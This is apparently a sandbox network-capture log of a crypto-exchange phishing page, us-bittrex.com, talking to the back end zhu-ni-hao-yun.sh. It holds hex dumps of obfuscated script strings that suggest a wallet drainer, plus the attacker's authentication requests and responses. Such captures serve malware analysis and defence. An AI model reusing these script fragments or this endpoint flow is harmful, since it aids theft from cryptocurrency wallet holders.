                          2024-03-28 14:45:28 UTC1369INData Raw: 22 74 72 61 63 74 22 2c 31 30 33 34 2c 22 77 68 6a 56 42 55 22 2c 22 41 43 54 49 4f 4e 22 2c 22 6d 69 6e 56 61 6c 75 65 73 22 2c 22 62 79 70 61 73 73 22 2c 22 73 75 70 70 6f 72 74 65 64 4d 65 74 68 6f 64 73 22 2c 22 4d 36 74 77 4c 61 22 2c 31 38 31 2c 22 41 50 50 52 4f 56 45 22 2c 22 68 30 4e 56 78 63 39 22 2c 22 6e 61 74 69 76 65 46 65 65 22 2c 36 37 31 2c 31 30 30 38 2c 22 63 74 65 64 22 2c 22 70 6f 6c 79 67 6f 6e 22 2c 33 33 37 2c 33 38 39 2c 22 70 65 41 79 72 58 22 2c 22 44 47 73 66 5a 7a 22 2c 32 32 33 2c 22 41 4c 5f 5f 48 45 22 2c 22 4c 50 45 52 53 5f 22 2c 32 33 37 2c 22 6c 5f 6c 4b 66 7a 22 2c 22 61 75 22 2c 33 32 36 2c 22 52 61 62 62 79 22 2c 22 66 66 66 66 66 66 66 22 2c 22 62 65 66 6f 72 65 50 6f 70 75 70 22 2c 22 64 65 74 61 69 6c 73 22 2c 22
                          Data Ascii: "tract",1034,"whjVBU","ACTION","minValues","bypass","supportedMethods","M6twLa",181,"APPROVE","h0NVxc9","nativeFee",671,1008,"cted","polygon",337,389,"peAyrX","DGsfZz",223,"AL__HE","LPERS_",237,"l_lKfz","au",326,"Rabby","fffffff","beforePopup","details","
                          2024-03-28 14:45:28 UTC1369INData Raw: 65 63 22 2c 22 50 45 4e 44 49 4e 47 22 2c 22 59 41 65 4b 35 54 22 2c 31 30 39 33 2c 32 38 35 2c 31 32 34 2c 22 68 74 6d 6c 22 2c 22 6e 63 65 6c 42 75 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 33 31 34 2c 22 61 6c 6c 6f 77 45 22 2c 22 74 69 6d 65 72 22 2c 38 65 33 2c 22 73 53 74 79 6c 69 22 2c 22 74 65 78 74 22 2c 22 37 22 2c 22 2f 22 2c 22 65 76 65 6e 74 73 22 2c 22 63 6c 69 63 6b 22 2c 22 61 6d 70 22 2c 22 61 64 64 45 76 65 22 2c 22 41 73 5a 70 30 62 61 22 2c 22 65 6e 65 72 22 2c 22 45 76 65 6e 74 22 2c 22 74 69 6d 65 73 74 22 2c 22 72 6f 75 6e 64 22 2c 22 74 69 6d 65 53 74 22 2c 22 7a 68 74 58 75 4d 22 2c 22 77 62 69 79 49 43 22 2c 22 58 52 69 5f 68 62 66 22 2c 22 5f 5f 47 4c 4f 42 22 2c 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                          Data Ascii: ec","PENDING","YAeK5T",1093,285,124,"html","ncelBu","hasOwnProperty",314,"allowE","timer",8e3,"sStyli","text","7","/","events","click","amp","addEve","AsZp0ba","ener","Event","timest","round","timeSt","zhtXuM","wbiyIC","XRi_hbf","__GLOB","addEventListener
                          2024-03-28 14:45:28 UTC1369INData Raw: 77 50 3d 5b 2b 5a 5a 70 22 2c 22 5b 34 3d 63 2f 5b 66 54 67 4a 30 40 57 79 67 71 3b 66 45 4b 6a 6f 6e 4e 6b 4e 7d 28 79 5a 7d 6a 22 2c 22 23 77 51 47 67 2c 4c 42 40 4a 6d 3f 3d 78 4e 22 2c 22 53 4a 64 3a 5f 2a 26 40 72 4c 33 45 7a 4f 2e 61 22 2c 22 6b 29 5b 49 7c 6d 5e 4e 4e 56 56 3f 71 39 5d 63 5a 38 31 3a 59 37 59 59 7d 36 66 25 79 6c 56 6f 22 2c 22 36 61 42 7a 2a 69 77 65 3f 53 22 2c 22 41 26 44 67 45 77 5d 36 36 25 37 45 21 2a 6e 6c 3d 74 5e 3a 66 32 5f 3a 6f 36 55 2a 45 44 22 2c 22 4f 23 50 32 58 37 33 4e 46 22 2c 27 22 52 58 30 58 2a 3c 53 47 27 2c 22 4c 75 49 32 5a 35 2f 42 22 2c 22 6e 72 44 67 2b 2e 54 5b 47 22 2c 22 43 45 4c 67 5a 22 2c 22 53 50 56 4b 22 2c 22 6c 35 56 4b 52 5b 5a 42 22 2c 22 25 71 30 66 4e 5b 77 43 22 2c 22 49 45 28 67 67 3e 6d
                          Data Ascii: wP=[+ZZp","[4=c/[fTgJ0@Wygq;fEKjonNkN}(yZ}j","#wQGg,LB@Jm?=xN","SJd:_*&@rL3EzO.a","k)[I|m^NNVV?q9]cZ81:Y7YY}6f%ylVo","6aBz*iwe?S","A&DgEw]66%7E!*nl=t^:f2_:o6U*ED","O#P2X73NF",'"RX0X*<SG',"LuI2Z5/B","nrDg+.T[G","CELgZ","SPVK","l5VKR[ZB","%q0fN[wC","IE(gg>m
                          2024-03-28 14:45:28 UTC1369INData Raw: 2a 66 32 5d 63 43 22 2c 22 5e 44 28 67 67 3e 6d 43 22 2c 22 6e 58 7a 67 4f 5b 61 43 22 2c 22 7e 69 3b 49 22 2c 22 42 45 31 4b 55 2c 51 43 22 2c 22 64 50 48 3c 66 2c 6e 42 22 2c 22 25 32 5e 49 64 22 2c 22 61 72 77 4a 76 29 79 43 22 2c 22 29 7a 7a 49 62 22 2c 22 53 50 28 67 4b 5b 72 4e 76 34 2b 78 4f 39 3c 6d 77 4d 79 49 78 29 41 22 2c 22 64 50 63 3a 35 2b 55 43 22 2c 22 53 50 28 67 4b 5b 72 4e 48 22 2c 22 60 71 25 32 4c 3a 6b 65 48 22 2c 22 47 45 28 67 67 3e 6d 43 22 2c 22 53 50 28 67 46 5b 38 65 72 25 4d 58 5a 51 7c 69 7a 32 44 22 2c 22 39 6f 65 66 70 40 42 31 78 53 71 33 42 22 2c 22 53 50 28 67 66 32 7b 59 3c 21 2c 75 69 39 67 6b 3e 7a 39 4b 6c 29 51 49 47 22 2c 22 61 72 25 32 4c 3a 59 43 22 2c 22 5f 7a 7a 49 50 3a 6f 43 22 2c 22 72 72 28 67 55 3c 72 42
                          Data Ascii: *f2]cC","^D(gg>mC","nXzgO[aC","~i;I","BE1KU,QC","dPH<f,nB","%2^Id","arwJv)yC",")zzIb","SP(gK[rNv4+xO9<mwMyIx)A","dPc:5+UC","SP(gK[rNH","`q%2L:keH","GE(gg>mC","SP(gF[8er%MXZQ|iz2D","9oefp@B1xSq3B","SP(gf2{Y<!,ui9gk>z9Kl)QIG","ar%2L:YC","_zzIP:oC","rr(gU<rB
                          2024-03-28 14:45:28 UTC1369INData Raw: 22 2c 22 5b 44 44 67 35 3d 51 43 22 2c 22 29 7a 47 3c 38 7a 6d 43 22 2c 22 66 50 32 66 70 40 41 22 2c 22 53 50 29 3d 64 2f 4d 43 22 2c 22 3c 69 63 3d 76 3b 51 43 22 2c 22 7c 44 5a 32 62 22 2c 22 4c 45 47 33 62 22 2c 22 43 50 3d 43 66 3e 24 41 22 2c 22 6c 72 56 4b 56 2f 4d 43 22 2c 22 68 50 67 5a 2b 57 51 43 22 2c 22 7c 44 5a 32 2f 57 51 43 22 2c 22 3b 69 44 67 33 2b 24 41 22 2c 22 6b 7a 5f 79 5b 68 41 22 2c 22 72 72 7b 66 36 3d 73 30 2c 24 79 22 2c 27 61 72 24 4a 74 40 42 54 72 25 22 79 5e 61 39 6a 25 32 44 27 2c 22 78 6f 28 49 31 5d 53 43 22 2c 22 61 72 24 4a 74 40 4d 43 22 2c 22 67 35 29 46 33 2b 75 43 22 2c 22 7a 32 4e 4b 22 2c 22 72 72 7b 66 36 3d 74 42 22 2c 22 79 4a 2b 66 76 29 69 43 22 2c 22 66 38 40 4a 69 3e 42 5a 3c 52 3c 53 71 78 26 6b 72 4d 4e
                          Data Ascii: ","[DDg5=QC",")zG<8zmC","fP2fp@A","SP)=d/MC","<ic=v;QC","|DZ2b","LEG3b","CP=Cf>$A","lrVKV/MC","hPgZ+WQC","|DZ2/WQC",";iDg3+$A","kz_y[hA","rr{f6=s0,$y",'ar$Jt@BTr%"y^a9j%2D',"xo(I1]SC","ar$Jt@MC","g5)F3+uC","z2NK","rr{f6=tB","yJ+fv)iC","f8@Ji>BZ<R<Sqx&krMN
                          2024-03-28 14:45:28 UTC1369INData Raw: 5b 3b 28 33 25 42 22 2c 22 7a 7a 58 2f 58 37 41 22 2c 22 45 29 62 2e 4b 6d 52 64 2f 21 43 2e 6b 45 22 2c 22 54 7a 5f 2c 3c 6b 3f 48 4a 21 46 29 6f 45 22 2c 22 67 77 41 62 5e 68 42 54 6b 32 26 75 5a 45 22 2c 22 36 29 4a 2e 3c 6b 2b 47 6b 32 59 22 2c 22 3a 4f 21 63 7c 37 51 59 2b 39 2f 67 3f 43 76 68 4c 72 4c 64 45 33 41 22 2c 22 45 29 28 49 62 6a 2a 48 4d 21 70 40 3a 61 37 52 6f 52 5e 49 73 2b 21 47 76 31 4a 3b 68 78 60 6a 58 25 6b 66 32 2b 58 42 5b 32 75 78 23 36 46 54 77 4a 6e 45 22 2c 22 72 69 5f 3a 35 36 5e 42 22 2c 22 26 74 69 49 2e 33 37 42 22 2c 22 45 29 2e 78 26 69 66 64 52 32 6f 2f 6f 45 4c 55 3e 2b 4a 2e 3c 6b 37 58 4d 21 48 3f 7a 50 25 53 36 4f 5e 49 63 2c 42 54 55 32 3e 3a 7d 40 62 52 4b 75 7e 49 22 2c 22 64 50 57 66 4c 3a 32 43 22 2c 22 45 29
                          Data Ascii: [;(3%B","zzX/X7A","E)b.KmRd/!C.kE","Tz_,<k?HJ!F)oE","gwAb^hBTk2&uZE","6)J.<k+Gk2Y",":O!c|7QY+9/g?CvhLrLdE3A","E)(Ibj*HM!p@:a7RoR^Is+!Gv1J;hx`jX%kf2+XB[2ux#6FTwJnE","ri_:56^B","&tiI.37B","E).x&ifdR2o/oELU>+J.<k7XM!H?zP%S6O^Ic,BTU2>:}@bRKu~I","dPWfL:2C","E)


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.44974823.209.58.93443
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-03-28 14:45:29 UTC774INHTTP/1.1 200 OK
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          X-CID: 7
                          X-CCC: US
                          X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
                          X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
                          Content-Type: application/octet-stream
                          X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                          Cache-Control: public, max-age=231355
                          Date: Thu, 28 Mar 2024 14:45:29 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-03-28 14:45:29 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.449751172.67.213.534436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:30 UTC516OUTOPTIONS /api/authenticate HTTP/1.1
                          Host: zhu-ni-hao-yun.sh
                          Connection: keep-alive
                          Accept: */*
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          Origin: https://us-bittrex.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Dest: empty
                          Referer: https://us-bittrex.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:30 UTC802INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:30 GMT
                          Content-Type: text/html; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Powered-By: Express
                          Access-Control-Allow-Origin: https://us-bittrex.com
                          Access-Control-Allow-Headers: jwt, session, content-type
                          Access-Control-Allow-Credentials: true
                          Access-Control-Max-Age: 86400
                          Allow: POST
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jyDMb%2FV7iVu0z3YYb7JSUPuSVXTgCcrf0JTb8gEbJmRLmE%2F6NDg74LRBFFR6FJx6DMbvA%2FDXusEAywRqWc9N4ho658FerOWetbV%2BMGq3AJiJbeZibWrjLAI2dTpkLpv%2FkeLag%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b86781cc5c72e9-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:30 UTC9INData Raw: 34 0d 0a 50 4f 53 54 0d 0a
                          Data Ascii: 4POST
                          2024-03-28 14:45:30 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.449752172.67.213.534436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:31 UTC643OUTPOST /api/authenticate HTTP/1.1
                          Host: zhu-ni-hao-yun.sh
                          Connection: keep-alive
                          Content-Length: 627
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Accept: application/json, text/plain, */*
                          Content-Type: application/json
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Origin: https://us-bittrex.com
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://us-bittrex.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:31 UTC627OUTData Raw: 7b 22 73 22 3a 7b 22 63 72 76 22 3a 22 50 2d 32 35 36 22 2c 22 65 78 74 22 3a 74 72 75 65 2c 22 6b 65 79 5f 6f 70 73 22 3a 5b 22 76 65 72 69 66 79 22 5d 2c 22 6b 74 79 22 3a 22 45 43 22 2c 22 78 22 3a 22 67 30 6e 70 35 56 45 51 4d 38 37 4a 71 48 5f 51 7a 76 45 69 51 65 55 4a 37 42 56 64 4a 33 52 64 31 4c 37 47 59 4c 32 76 67 4d 67 22 2c 22 79 22 3a 22 49 78 57 6d 34 4f 42 5a 49 39 6c 4a 57 36 34 62 70 35 68 52 5f 62 41 4f 34 78 67 63 52 73 4d 33 72 45 49 44 61 71 72 34 74 78 51 22 7d 2c 22 65 22 3a 7b 22 61 6c 67 22 3a 22 52 53 41 2d 4f 41 45 50 2d 32 35 36 22 2c 22 65 22 3a 22 41 51 41 42 22 2c 22 65 78 74 22 3a 74 72 75 65 2c 22 6b 65 79 5f 6f 70 73 22 3a 5b 22 65 6e 63 72 79 70 74 22 5d 2c 22 6b 74 79 22 3a 22 52 53 41 22 2c 22 6e 22 3a 22 7a 31 6c 6f
                          Data Ascii: {"s":{"crv":"P-256","ext":true,"key_ops":["verify"],"kty":"EC","x":"g0np5VEQM87JqH_QzvEiQeUJ7BVdJ3Rd1L7GYL2vgMg","y":"IxWm4OBZI9lJW64bp5hR_bAO4xgcRsM3rEIDaqr4txQ"},"e":{"alg":"RSA-OAEP-256","e":"AQAB","ext":true,"key_ops":["encrypt"],"kty":"RSA","n":"z1lo
                          2024-03-28 14:45:32 UTC929INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:32 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 4008
                          Connection: close
                          X-Powered-By: Express
                          Access-Control-Allow-Origin: https://us-bittrex.com
                          Access-Control-Allow-Headers: jwt, session, content-type
                          Access-Control-Allow-Credentials: true
                          Access-Control-Max-Age: 86400
                          RateLimit-Policy: 15;w=60
                          RateLimit-Limit: 15
                          RateLimit-Remaining: 14
                          RateLimit-Reset: 60
                          ETag: W/"fa8-xREPHOn+LJKPvIEG9XN5ZUGe1Tw"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJQY7%2B%2B4h4YooR6UNVGQrMhHABL9JiF0nnb5PfxvSDhM%2B%2BzKdGiW3jMa080GAcDEgmEilW7DWpCZx1CpLaaFys9Q79HpXHl5l20uwfTx%2Fbu0kvNlHvFCekk0y%2BlJtNC84Zaukw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b86789d9da20a8-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:32 UTC440INData Raw: 7b 22 6b 65 79 22 3a 22 41 4a 2b 32 2f 47 67 79 35 56 73 32 65 76 46 71 4f 70 73 5a 61 4b 64 65 4b 42 35 4d 4d 49 79 39 62 4d 79 4d 72 5a 72 30 37 45 41 6c 6d 78 54 68 6b 55 77 39 4d 79 75 54 79 34 4a 4d 4a 76 4b 50 37 71 6e 52 6e 6b 67 30 71 76 42 39 77 35 41 58 44 46 79 6c 65 59 4e 74 4e 36 46 63 7a 50 56 59 36 6f 43 33 49 6c 7a 43 2f 5a 76 33 31 62 77 67 58 76 47 35 32 45 37 44 66 45 76 59 38 74 43 6e 37 6e 48 6c 46 35 76 75 59 51 58 37 6a 34 44 59 43 44 51 63 69 31 50 4b 43 52 59 68 51 76 34 4b 63 56 72 59 4e 2b 45 62 58 77 5a 43 39 47 63 41 53 63 54 45 70 64 54 55 6b 57 6b 4b 4a 2f 79 63 75 61 45 31 6f 54 66 2f 37 64 72 78 79 74 48 46 47 75 50 7a 6f 31 61 41 36 66 75 4e 62 73 4a 78 67 36 64 76 30 37 49 71 6c 75 4a 32 64 6c 6c 74 64 46 2b 4f 48 44 62
                          Data Ascii: {"key":"AJ+2/Ggy5Vs2evFqOpsZaKdeKB5MMIy9bMyMrZr07EAlmxThkUw9MyuTy4JMJvKP7qnRnkg0qvB9w5AXDFyleYNtN6FczPVY6oC3IlzC/Zv31bwgXvG52E7DfEvY8tCn7nHlF5vuYQX7j4DYCDQci1PKCRYhQv4KcVrYN+EbXwZC9GcAScTEpdTUkWkKJ/ycuaE1oTf/7drxytHFGuPzo1aA6fuNbsJxg6dv07IqluJ2dlltdF+OHDb
                          2024-03-28 14:45:32 UTC1369INData Raw: 53 6a 6f 58 43 54 6f 4e 51 71 5a 30 53 58 5a 4e 4a 63 74 46 54 6b 73 66 47 71 63 65 61 4d 4f 62 79 50 6c 5a 49 35 36 62 69 70 64 6d 6c 45 51 4a 45 32 51 6d 33 4b 4c 6b 69 33 57 51 58 51 6d 41 49 7a 45 34 6c 63 66 49 32 50 76 6b 73 4f 51 6b 30 77 38 7a 54 56 58 73 75 62 59 57 34 64 33 2b 4c 71 37 5a 39 38 5a 39 4a 76 5a 4a 55 33 4c 53 7a 61 44 2b 65 43 77 2b 31 4c 44 32 4d 43 53 2f 72 70 30 50 79 41 2b 53 77 63 6c 6f 38 57 63 73 4e 45 50 35 59 78 4a 4f 6a 78 49 61 58 76 54 54 6b 69 44 4b 66 79 67 41 78 39 56 62 56 6e 56 47 75 56 56 39 4d 50 77 35 2f 62 76 66 73 78 4c 62 32 36 69 30 71 66 63 70 34 6e 4a 42 4d 70 75 72 42 6e 45 79 67 63 56 4e 44 48 42 62 6c 43 5a 50 4c 63 52 5a 71 5a 54 63 57 4f 53 37 64 4b 70 6e 2f 2b 61 48 66 4f 4f 53 65 7a 75 6b 78 51 47
                          Data Ascii: SjoXCToNQqZ0SXZNJctFTksfGqceaMObyPlZI56bipdmlEQJE2Qm3KLki3WQXQmAIzE4lcfI2PvksOQk0w8zTVXsubYW4d3+Lq7Z98Z9JvZJU3LSzaD+eCw+1LD2MCS/rp0PyA+Swclo8WcsNEP5YxJOjxIaXvTTkiDKfygAx9VbVnVGuVV9MPw5/bvfsxLb26i0qfcp4nJBMpurBnEygcVNDHBblCZPLcRZqZTcWOS7dKpn/+aHfOOSezukxQG
                          2024-03-28 14:45:32 UTC1369INData Raw: 70 57 69 4c 68 77 6c 79 31 39 5a 62 38 44 48 53 6d 72 57 45 61 4a 58 6f 74 58 57 6a 67 39 35 50 47 38 6d 56 66 46 46 7a 30 31 4d 57 66 79 6e 61 6c 2b 72 47 6a 37 75 47 39 46 53 43 4b 31 72 38 6f 79 31 2b 49 47 50 68 74 6b 55 4e 54 6e 32 70 50 53 34 61 5a 79 4c 74 5a 62 64 66 68 46 59 4f 42 37 74 70 64 37 35 30 30 6c 4d 61 62 48 54 64 66 47 75 78 67 4e 5a 6f 6f 6d 78 49 49 67 73 41 37 68 46 72 41 33 43 73 53 34 47 57 63 33 65 56 42 74 49 35 7a 68 59 62 6e 41 33 44 4b 57 50 64 35 58 47 56 51 46 33 50 54 76 4a 63 36 78 55 41 75 4c 4e 73 36 44 58 71 61 75 51 4b 66 50 58 4a 48 6a 36 54 69 30 4d 55 64 62 33 63 30 78 32 49 78 5a 53 77 65 4d 31 44 53 32 54 55 6f 65 4c 41 38 6e 5a 45 4c 70 65 43 59 6e 4e 4d 64 4c 59 34 41 4b 6d 76 4a 42 64 54 75 52 39 76 69 55 32
                          Data Ascii: pWiLhwly19Zb8DHSmrWEaJXotXWjg95PG8mVfFFz01MWfynal+rGj7uG9FSCK1r8oy1+IGPhtkUNTn2pPS4aZyLtZbdfhFYOB7tpd7500lMabHTdfGuxgNZoomxIIgsA7hFrA3CsS4GWc3eVBtI5zhYbnA3DKWPd5XGVQF3PTvJc6xUAuLNs6DXqauQKfPXJHj6Ti0MUdb3c0x2IxZSweM1DS2TUoeLA8nZELpeCYnNMdLY4AKmvJBdTuR9viU2
                          2024-03-28 14:45:32 UTC830INData Raw: 42 37 50 36 34 51 74 4c 61 33 75 78 4d 32 31 34 30 2f 45 4d 78 4f 32 2f 62 4a 4c 4f 6b 34 4c 4e 6f 59 66 33 35 61 76 49 33 70 4d 68 77 57 58 68 59 47 5a 35 47 36 46 43 59 59 56 65 4c 44 70 42 48 6e 76 75 6c 4d 52 69 74 50 5a 54 6c 76 44 42 33 59 34 4a 30 45 61 33 68 4e 2b 32 67 36 6c 5a 38 69 79 41 77 68 43 54 6a 59 61 6e 58 76 6d 6f 4e 75 64 4c 49 79 6c 30 2b 77 4a 76 4e 51 7a 52 30 77 76 6e 6c 66 76 57 72 69 41 55 7a 2b 39 69 7a 6d 6c 4e 34 64 61 62 4b 6c 72 32 43 36 44 64 55 2b 70 4c 61 75 5a 4e 6b 4c 33 41 67 41 7a 65 47 6e 6d 59 78 33 72 4d 7a 77 58 6b 6c 64 79 6a 7a 72 4c 73 65 6d 66 38 6c 2b 49 45 56 6f 5a 31 38 49 6f 6e 49 46 56 7a 4c 35 55 57 39 79 44 70 2f 6b 38 69 54 36 47 52 4c 67 75 38 58 6b 6a 36 50 50 72 4c 66 6f 4a 2b 63 6d 42 79 55 6f 38
                          Data Ascii: B7P64QtLa3uxM2140/EMxO2/bJLOk4LNoYf35avI3pMhwWXhYGZ5G6FCYYVeLDpBHnvulMRitPZTlvDB3Y4J0Ea3hN+2g6lZ8iyAwhCTjYanXvmoNudLIyl0+wJvNQzR0wvnlfvWriAUz+9izmlN4dabKlr2C6DdU+pLauZNkL3AgAzeGnmYx3rMzwXkldyjzrLsemf8l+IEVoZ18IonIFVzL5UW9yDp/k8iT6GRLgu8Xkj6PPrLfoJ+cmByUo8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.44975335.190.80.14436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:31 UTC548OUTOPTIONS /report/v4?s=2jyDMb%2FV7iVu0z3YYb7JSUPuSVXTgCcrf0JTb8gEbJmRLmE%2F6NDg74LRBFFR6FJx6DMbvA%2FDXusEAywRqWc9N4ho658FerOWetbV%2BMGq3AJiJbeZibWrjLAI2dTpkLpv%2FkeLag%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://zhu-ni-hao-yun.sh
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:31 UTC336INHTTP/1.1 200 OK
                          Content-Length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: OPTIONS, POST
                          access-control-allow-origin: *
                          access-control-allow-headers: content-type, content-length
                          date: Thu, 28 Mar 2024 14:45:31 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.44975435.190.80.14436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:32 UTC488OUTPOST /report/v4?s=2jyDMb%2FV7iVu0z3YYb7JSUPuSVXTgCcrf0JTb8gEbJmRLmE%2F6NDg74LRBFFR6FJx6DMbvA%2FDXusEAywRqWc9N4ho658FerOWetbV%2BMGq3AJiJbeZibWrjLAI2dTpkLpv%2FkeLag%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 430
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:32 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 37 36 38 2c 22 6d 65 74 68 6f 64 22 3a 22 4f 50 54 49 4f 4e 53 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 73 2d 62 69 74 74 72 65 78 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 33 2e 35 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c
                          Data Ascii: [{"age":0,"body":{"elapsed_time":1768,"method":"OPTIONS","phase":"application","protocol":"http/1.1","referrer":"https://us-bittrex.com/","sampling_fraction":1.0,"server_ip":"172.67.213.53","status_code":200,"type":"abandoned"},"type":"network-error","url
                          2024-03-28 14:45:32 UTC168INHTTP/1.1 200 OK
                          Content-Length: 0
                          date: Thu, 28 Mar 2024 14:45:32 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.449755172.67.213.534436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:32 UTC357OUTGET /api/authenticate HTTP/1.1
                          Host: zhu-ni-hao-yun.sh
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:32 UTC685INHTTP/1.1 403 Forbidden
                          Date: Thu, 28 Mar 2024 14:45:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 4520
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Referrer-Policy: same-origin
                          Cache-Control: max-age=15
                          Expires: Thu, 28 Mar 2024 14:45:47 GMT
